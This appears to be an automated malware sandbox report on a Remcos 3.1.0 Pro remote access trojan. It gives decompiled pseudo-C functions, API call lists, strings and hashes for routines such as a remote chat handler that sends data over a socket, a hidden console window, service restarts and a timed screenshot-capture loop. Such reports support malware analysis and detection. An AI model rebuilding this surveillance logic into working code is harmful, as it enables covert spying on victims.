				_t49 =  *0x46900c; // 0x7c295e5c
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0043E989(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0042F3BB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0043025F(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00440E30(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0043025F(_t101);
									goto L36;
								}
								_t62 = E00440E30(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0043025F(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043E13D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E0044FBB0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00440E30(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043E13D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0044FBB0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00442da4
0x00442da5
0x00442da6
0x00442dad
0x00442db1
0x00442db2
0x00442db8
0x00442dbe
0x00442dc4
0x00442dc7
0x00442dc7
0x00442dca
0x00442dcc
0x00442dcc
0x00442dca
0x00442dce
0x00442dd3
0x00442dda
0x00442ddd
0x00442ddd
0x00442df9
0x00442dff
0x00442e04
0x00442f97
0x00442faa
0x00442e0a
0x00442e0a
0x00442e0d
0x00442e12
0x00442e16
0x00442e6a
0x00442e6a
0x00442e6c
0x00442e6e
0x00442f8c
0x00442f8c
0x00442f8e
0x00442f8f
0x00000000
0x00442f95
0x00442e7f
0x00442e85
0x00442e87
0x00000000
0x00000000
0x00442e8d
0x00442e9f
0x00442ea4
0x00442ea8
0x00000000
0x00000000
0x00442eb5
0x00442eef
0x00442ef2
0x00442ef5
0x00442ef7
0x00442ef9
0x00442efb
0x00442f47
0x00442f47
0x00442f49
0x00442f49
0x00442f4b
0x00442f85
0x00442f86
0x00000000
0x00442f8b
0x00442f5f
0x00442f64
0x00442f66
0x00000000
0x00000000
0x00442f6a
0x00442f6b
0x00442f6c
0x00442f6f
0x00442fab
0x00442fae
0x00442f71
0x00442f71
0x00442f72
0x00442f72
0x00442f7f
0x00442f81
0x00442f83
0x00442fb4
0x00000000
0x00000000
0x00000000
0x00000000
0x00442f83
0x00442efd
0x00442f00
0x00442f02
0x00442f04
0x00442f06
0x00442f09
0x00442f0e
0x00442f29
0x00442f2b
0x00442f35
0x00442f37
0x00442f38
0x00442f3a
0x00000000
0x00000000
0x00442f3c
0x00442f42
0x00442f42
0x00000000
0x00442f42
0x00442f10
0x00442f12
0x00442f16
0x00442f1b
0x00442f1d
0x00442f1f
0x00000000
0x00000000
0x00442f21
0x00000000
0x00442f21
0x00442eb7
0x00442ebc
0x00000000
0x00000000
0x00442ec2
0x00442ec4
0x00000000
0x00000000
0x00442edb
0x00442ee0
0x00442ee4
0x00000000
0x00000000
0x00000000
0x00442eea
0x00442e1d
0x00442e1f
0x00442e21
0x00442e29
0x00442e48
0x00442e4a
0x00442e54
0x00442e56
0x00442e57
0x00442e59
0x00000000
0x00000000
0x00442e5f
0x00442e65
0x00442e65
0x00000000
0x00442e65
0x00442e2d
0x00442e31
0x00442e36
0x00442e3a
0x00000000
0x00000000
0x00442e40
0x00000000
0x00442e40

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00437FB6,00437FB6,?,?,?,00442FF0,00000001,00000001,8CE85006), ref: 00442DF9
__alloca_probe_16.LIBCMT ref: 00442E31
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00442FF0,00000001,00000001,8CE85006,?,?,?), ref: 00442E7F
__alloca_probe_16.LIBCMT ref: 00442F16
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8CE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00442F79
__freea.LIBCMT ref: 00442F86

Part of subcall function 0043E13D: RtlAllocateHeap.NTDLL(00000000,0042F6B9,?,?,00430DF7,?,?,00000000,?,?,0040B6B7,0042F6B9,?,?,?,?), ref: 0043E16F

__freea.LIBCMT ref: 00442F8F
__freea.LIBCMT ref: 00442FB4

Strings

\^)|/, xrefs: 00442DA6

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: \^)|/
API String ID: 3864826663-265608074
Opcode ID: 8fd1e8d2939faedbc4f26391032896ba10c6c4a55afb93b1390a87c3e3958755
Instruction ID: a5a3f342f8629700152a4776d8d689dedea2c9fa648beb9443742c86f77ae9e9
Opcode Fuzzy Hash: 8fd1e8d2939faedbc4f26391032896ba10c6c4a55afb93b1390a87c3e3958755
Instruction Fuzzy Hash: FD510572700606ABFB248E61CD41EAFB7B9EF44750F95066AFC04D7240EBB8DC44D698

Uniqueness

Uniqueness Score: -1.00%

Function 004052A6, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 154
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004052A6(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t29;
				intOrPtr _t44;
				intOrPtr _t45;
				void* _t57;
				intOrPtr _t70;
				void* _t112;
				void* _t113;
				void* _t115;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t126 = __eflags;
				_t102 = __edx;
				_t70 = _a4;
				E00402036(_t70,  &_v104, __edx, __eflags, _t70 + 0x1c);
				SetEvent( *(_t70 + 0x34));
				_t29 = L00401EF9( &_v108);
				E00404153( &_v108,  &_v60, 4, 0xffffffff);
				_t121 = (_t118 & 0xfffffff8) - 0x5c;
				E00402036(_t70, _t121, _t102, _t126, 0x46b218);
				_t122 = _t121 - 0x18;
				E00402036(_t70, _t122, _t102, _t126,  &_v76);
				E00416EC5( &_v140, _t102);
				_t123 = _t122 + 0x30;
				_t112 =  *_t29 - 0x3a;
				if(_t112 == 0) {
					_t113 = L00409D76(L00401EF9(L00401DAD( &_v116, _t102, __eflags, 0)));
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						L00401DD8( &_v116, _t102);
						L00401F11();
						L00401F11();
						__eflags = 0;
						return 0;
					}
					 *0x46aaec = L00409DCC(_t113, "DisplayMessage");
					_t44 = L00409DCC(_t113, "GetMessage");
					_t105 = "CloseChat";
					 *0x46aae4 = _t44;
					_t45 = L00409DCC(_t113, "CloseChat");
					_t124 = _t123 - 0x18;
					 *0x46aae8 = _t45;
					 *0x46aae1 = 1;
					E00402036(_t70, _t124, "CloseChat", __eflags, 0x46b298);
					_push(0x74);
					L0040495D(_t70, _t70, _t105, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46aae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t124 = _t124 - 0x18;
						L00401FF5(_t70, _t124, _t105, __eflags, _v140, _t50);
						_push(0x3b);
						L0040495D(_t70, _t70, _t105, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t128 = _t112 != 1;
				if(_t112 != 1) {
					goto L7;
				}
				_t102 = L00401DAD( &_v116, _t102, _t128, 0);
				_t57 =  *0x46aaec(L00401E4F(L00416DA4(_t54, _t128)));
				L00401E54();
				_t129 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040412C(_t70,  &_v80, 0x45e658);
				_t102 =  &_v84;
				L00416D80(_t70, _t123 - 0x18,  &_v84);
				_push(0x3b);
				L0040495D(_t70, _t70,  &_v84, _t129);
				L00401E54();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x004052a6
0x004052a6
0x004052b4
0x004052bd
0x004052c5
0x004052cf
0x004052e3
0x004052e8
0x004052f2
0x004052f7
0x00405301
0x0040530a
0x0040530f
0x00405312
0x00405315
0x004053f1
0x004053f3
0x004053f5
0x004053b3
0x004053b7
0x004053c0
0x004053c9
0x004053d0
0x004053d6
0x004053d6
0x00405408
0x0040540f
0x00405414
0x00405419
0x00405420
0x00405425
0x00405428
0x0040542f
0x0040543b
0x00405440
0x00405444
0x00405449
0x00405452
0x00405462
0x00405464
0x00405466
0x00405470
0x00405475
0x00405479
0x00405484
0x00405484
0x00000000
0x00405464
0x0040531b
0x0040531e
0x00000000
0x00000000
0x00405330
0x00405343
0x00405350
0x00405355
0x00405357
0x00000000
0x00000000
0x00405362
0x0040536a
0x00405370
0x00405375
0x00405379
0x00405382
0x00000000
0x00405387
0x0040539e
0x004053a9
0x004053a9
0x004053b1
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 004052C5
GetMessageA.USER32 ref: 0040538F
TranslateMessage.USER32(?), ref: 0040539E
DispatchMessageA.USER32 ref: 004053A9
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046B298), ref: 0040544C
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405484

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

Strings

GetMessage, xrefs: 00405403
CloseChat, xrefs: 00405414
DisplayMessage, xrefs: 004053F7

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: b0df590016ab86e0c3a477b2f8d5aab87678b56e67146da5976c742bf93d80d1
Instruction ID: 3c61c52c44a694eae9529a749c1d48c65d3fa971bf3bb3cdc4ee5a27e743bcbf
Opcode Fuzzy Hash: b0df590016ab86e0c3a477b2f8d5aab87678b56e67146da5976c742bf93d80d1
Instruction Fuzzy Hash: B941B1715047015BCB14FB76C95A96F37A8AF81744F40093FFA52A31E2EF789909CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00418617, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00418617(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ba4c(__ebx);
				 *0x46aeb0 = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043A671(_t36, "CONOUT$", "a", E00436135(1));
				E004315B0(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t3 = _t47 + 1; // 0x49b688
					_t47 = _t47 + 1;
				} while ( *_t3 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t6 = _t51 + 1; // 0x49b688
					_t51 = _t51 + 1;
				} while ( *_t6 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t8 = _t53 + 1; // 0x49b688
					_t53 = _t53 + 1;
				} while ( *_t8 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t10 = _t55 + 1; // 0x49b688
					_t55 = _t55 + 1;
				} while ( *_t10 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t13 = _t59 + 1; // 0x49b688
					_t59 = _t59 + 1;
					_t85 =  *_t13;
				} while ( *_t13 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E004046F2(_t85, _t30, 7);
			}

0x00418617
0x00418621
0x00418623
0x00418629
0x00418631
0x00418637
0x0041863c
0x0041863c
0x00418643
0x00418656
0x00418669
0x00418677
0x00418678
0x00418678
0x0041867b
0x0041867c
0x00418682
0x00418688
0x00418690
0x00418691
0x00418691
0x00418694
0x00418695
0x0041869e
0x0041869f
0x004186a0
0x004186a7
0x004186a8
0x004186a8
0x004186ab
0x004186ac
0x004186b5
0x004186b6
0x004186b7
0x004186bf
0x004186c0
0x004186c0
0x004186c3
0x004186c4
0x004186c8
0x004186d0
0x004186d2
0x004186da
0x004186db
0x004186db
0x004186de
0x004186df
0x004186df
0x004186f1
0x004186f4
0x00418700

APIs

AllocConsole.KERNEL32(00000001), ref: 00418623
GetConsoleWindow.KERNEL32 ref: 00418629
ShowWindow.USER32(00000000,00000000), ref: 0041863C

Strings

--------------------------, xrefs: 004186E6
3.1.0 Pro, xrefs: 004186B0
CONOUT$, xrefs: 00418651
--------------------------, xrefs: 00418683
* Remcos v, xrefs: 00418699
* BreakingSecurity.net, xrefs: 004186CB

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.0 Pro$CONOUT$
API String ID: 3461962499-2577073123
Opcode ID: 48078d05362bce17279b4f50587241572a22da6aae8f0f0a39d2bf1ec56aa04f
Instruction ID: c9c38229238dd4cd4e9be314bbf35b80782281e37992fc4f7b5cded16f880c06
Opcode Fuzzy Hash: 48078d05362bce17279b4f50587241572a22da6aae8f0f0a39d2bf1ec56aa04f
Instruction Fuzzy Hash: 7A214C32809A0126DF119F185C01FC6B769AFD2700F104697F88C7B291EBEA6DDE47AD

Uniqueness

Uniqueness Score: -1.00%

Function 00415EB8, Relevance: 15.1, APIs: 10, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00415EB8(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401E4F( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401E54();
				return _t22;
			}

0x00415ec3
0x00415ed5
0x00415ee4
0x00415ee8
0x00415f02
0x00415f14
0x00415f19
0x00415f1f
0x00415f28
0x00415f37
0x00415f3c
0x00415f3f
0x00415f42
0x00415f04
0x00415f0b
0x00415f0e
0x00415f10
0x00415f10
0x00415eea
0x00415eeb
0x00415eeb
0x00415f47
0x00415f54

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,?,00415877), ref: 00415EC7
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,00415877), ref: 00415EDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415877), ref: 00415EEB
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00415877), ref: 00415EFA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415877), ref: 00415F0B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415877), ref: 00415F0E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: a591370bdd9c5abdf4ba6bfe0a65f8ffa862d472525dce6b8337c39091771c1f
Instruction ID: c7cf0e825870336fcd8e6a449afa762fe3a97a7fe6fd6597e5e0ac32f9a08244
Opcode Fuzzy Hash: a591370bdd9c5abdf4ba6bfe0a65f8ffa862d472525dce6b8337c39091771c1f
Instruction Fuzzy Hash: 8311E532901718ABD711AB64DCC9DFF3B2CDB86B657000027FA05A2192DBA8CD46DAF5

Uniqueness

Uniqueness Score: -1.00%

Function 0044039E, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044039E(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4561b0) {
					L0043E9A5(_t52);
					_t26 = _a4;
				}
				L0043E9A5( *((intOrPtr*)(_t26 + 0x3c)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x30)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x34)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x38)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x28)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x2c)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x40)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x44)));
				L0043E9A5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00440264(5,  &_v8);
				_v8 =  &_a4;
				return E004402B4(4,  &_v8);
			}

0x004403a4
0x004403a7
0x004403af
0x004403b2
0x004403b7
0x004403ba
0x004403be
0x004403c9
0x004403d4
0x004403df
0x004403ea
0x004403f5
0x00440400
0x0044040b
0x00440419
0x00440421
0x0044042a
0x00440432
0x00440446

APIs

_free.LIBCMT ref: 004403B2

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 004403BE
_free.LIBCMT ref: 004403C9
_free.LIBCMT ref: 004403D4
_free.LIBCMT ref: 004403DF
_free.LIBCMT ref: 004403EA
_free.LIBCMT ref: 004403F5
_free.LIBCMT ref: 00440400
_free.LIBCMT ref: 0044040B
_free.LIBCMT ref: 00440419

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e851395514bdd15faa08013216755b7b5c4f209d4b3b9a62f90a46f2af991be9
Instruction ID: a6818c33c5a2a1cf9df5b8de73767ca8a0edee2b08ccccc870259ac04011b4c3
Opcode Fuzzy Hash: e851395514bdd15faa08013216755b7b5c4f209d4b3b9a62f90a46f2af991be9
Instruction Fuzzy Hash: C41149B5211108BFDF40EF57C842DDC3B74EF89364F0050AABA484F262DA35DE50AB45

Uniqueness

Uniqueness Score: -1.00%

Function 004153A9, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004153A9() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t82;
				struct _SECURITY_ATTRIBUTES* _t84;
				struct _SECURITY_ATTRIBUTES* _t91;
				void* _t129;
				void* _t130;
				void* _t138;
				void* _t139;
				void* _t144;
				intOrPtr _t145;
				void* _t146;
				void* _t147;
				void* _t148;

				E00450448(0x451a08, _t144);
				_push(_t139);
				 *((intOrPtr*)(_t144 - 0x10)) = _t145;
				_t91 = 0;
				 *((intOrPtr*)(_t144 - 4)) = 0;
				_t147 =  *0x46ae98 - _t91; // 0x0
				if(_t147 == 0) {
					_t145 = _t145 - 0xc;
					_t129 = _t144 - 0x68;
					L00413E37(_t129);
					__imp__GdiplusStartup(0x46ae98, _t129, 0);
				}
				_t148 =  *0x46ad68 - _t91; // 0x0
				if(_t148 == 0) {
					L00401E5E(0x46b860, _t130, _t139, L004148F7(_t144 - 0x40));
					L00401E54();
				}
				_t42 = L00401EF9(L00401DAD(0x46b558, _t130, _t148, 0x19));
				_t45 = L00401E4F(L00416CBE(_t144 - 0x58, L00401DAD(0x46b558, _t130, _t148, 0x1a), _t148));
				_t132 =  *_t42;
				L00401E5E(0x46b848,  *_t42, 0x46b848, E004179DE(_t144 - 0x40,  *_t42, _t45));
				L00401E54();
				L00401E54();
				CreateDirectoryW(L00401E4F(0x46b848), _t91);
				L00401ED1(_t91, _t144 - 0xb0);
				L00401ED1(_t91, _t144 - 0x80);
				 *(_t144 - 0x11) = _t91;
				 *0x46ae9c = 1;
				_t54 =  *((intOrPtr*)(_t144 + 8));
				_t143 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t144 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t138 = Sleep;
				L5:
				while(1) {
					if( *_t54 != 1) {
						L10:
						GetLocalTime(_t144 - 0x28);
						_push( *(_t144 - 0x1c) & 0x0000ffff);
						_push( *(_t144 - 0x1e) & 0x0000ffff);
						_push( *(_t144 - 0x20) & 0x0000ffff);
						_push( *(_t144 - 0x22) & 0x0000ffff);
						_push( *(_t144 - 0x26) & 0x0000ffff);
						L00413E10(_t144 - 0x2b8, _t143,  *(_t144 - 0x28) & 0x0000ffff);
						_t145 = _t145 + 0x20;
						L00401E5E(_t144 - 0x80, _t66, _t143, L00402F9A(_t91, _t144 - 0x58, L00402F9A(_t91, _t144 - 0x40, E0040708E(_t144 - 0x98, 0x46b848, __eflags, "\\"), _t138, __eflags, _t144 - 0x2b8), _t138, __eflags, "."));
						L00401E54();
						L00401E54();
						L00401E54();
						_t72 = L00401E4F(_t144 - 0x80);
						_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)) + 1));
						E004151E7(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t144 + 8))));
						if(__eflags != 0) {
							_t91 = 0;
							 *(_t144 - 0x11) = 0;
							_t78 = L00435E19(_t75, L00401EF9(L00401DAD(0x46b558, _t132, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = L00435E19(_t79, L00401EF9(L00401DAD(0x46b558, _t132, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t144 + 8));
						continue;
					}
					_t143 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t144 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t151 = _t91;
						if(_t91 != 0) {
							goto L10;
						}
						_t82 = L00401DAD(0x46b558, _t132, _t151, 0x17);
						_t146 = _t145 - 0x18;
						E00402036(_t91, _t146, _t132, _t151, _t82);
						_t84 = E0041743E(0, _t132);
						_t145 = _t146 + 0x18;
						_t91 = _t84;
						 *(_t144 - 0x11) = _t91;
						if(_t91 != 0) {
							goto L10;
						}
						Sleep(0x3e8);
					}
					goto L10;
				}
			}

0x004153ae
0x004153ba
0x004153bc
0x004153bf
0x004153c1
0x004153c4
0x004153ca
0x004153cc
0x004153cf
0x004153d2
0x004153e0
0x004153e0
0x004153e6
0x004153ec
0x004153fc
0x00415404
0x00415404
0x00415419
0x00415435
0x0041543b
0x0041544e
0x00415456
0x0041545e
0x0041546c
0x00415478
0x00415480
0x00415485
0x00415488
0x00415499
0x0041549f
0x004154a2
0x004154a5
0x00000000
0x004154ab
0x004154ae
0x004154ef
0x004154f3
0x004154fd
0x00415502
0x00415507
0x0041550c
0x00415511
0x0041551f
0x00415524
0x00415563
0x0041556b
0x00415573
0x0041557e
0x00415586
0x0041558e
0x00415593
0x004155a0
0x004155a3
0x004155c1
0x004155c3
0x004155da
0x004155da
0x004155a5
0x004155b9
0x004155b9
0x004155e2
0x004155e4
0x00000000
0x004155e4
0x004154b0
0x004154b5
0x004154b8
0x004154b8
0x004154ba
0x00000000
0x00000000
0x004154c3
0x004154c8
0x004154ce
0x004154d5
0x004154da
0x004154dd
0x004154df
0x004154e4
0x00000000
0x00000000
0x004154eb
0x004154eb
0x00000000
0x004154b8

APIs

__EH_prolog.LIBCMT ref: 004153AE
GdiplusStartup.GDIPLUS(0046AE98,?,00000000), ref: 004153E0

Part of subcall function 0040708E: char_traits.LIBCPMT ref: 004070A9

Part of subcall function 004151E7: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415240
Part of subcall function 004151E7: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004152C9

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041546C
Sleep.KERNEL32(000003E8), ref: 004154EB
GetLocalTime.KERNEL32(?), ref: 004154F3
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004155E2

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00415494
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041548F, 004154B0, 00415517

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3280235481-3790400642
Opcode ID: bb971762bfa363c3d109a8880994b80c52633df59591870d7afd579cd8c3e035
Instruction ID: 3a77f70eda13457513b8dfc5f48f62bb57cf4fcd3f3190105394cb1044ce7f5d
Opcode Fuzzy Hash: bb971762bfa363c3d109a8880994b80c52633df59591870d7afd579cd8c3e035
